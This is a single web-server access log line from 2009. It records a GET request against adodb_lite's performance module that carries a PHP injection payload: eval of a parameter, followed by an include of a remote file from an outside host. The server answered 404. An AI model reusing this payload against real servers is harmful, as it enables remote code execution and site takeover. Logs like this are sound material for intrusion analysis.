125.131.116.12 - - [27/Jun/2009:03:55:17 -0500] "GET /logs/access_log.1241913600/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
